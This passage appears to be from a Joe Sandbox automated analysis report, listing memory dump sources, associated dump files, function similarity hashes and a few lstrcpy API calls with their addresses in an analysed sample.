                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 4ebaafa499c3bd6de6ecd0cab9ca1db0e47b71e7e29bf4ae5b36c9bc16f3f47e
                          • Instruction ID: 728b969df17439cb836afcb57eda5e8e3b5c7a707b4dd18ff9a0155bc4e073a4
                          • Opcode Fuzzy Hash: 4ebaafa499c3bd6de6ecd0cab9ca1db0e47b71e7e29bf4ae5b36c9bc16f3f47e
                          • Instruction Fuzzy Hash: 2F31C275A15B02DFC724DF7AC998952BBE5BF883007444A2DA896C7B50DB74F811CF80
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0070162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701693
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 6e2d6273e2b211a95a279f44066238ad409b52d0739490c72eb3a194d8078a04
                          • Instruction ID: b1fb441abbcf29e8763f8f046f7c407d980313a26dd235fd4b6b70042a12416c
                          • Opcode Fuzzy Hash: 6e2d6273e2b211a95a279f44066238ad409b52d0739490c72eb3a194d8078a04
                          • Instruction Fuzzy Hash: 6E11EC75A25B02DBDB249F75D85C926B7F8BF44701748462DA496D3A80EB39F801CB90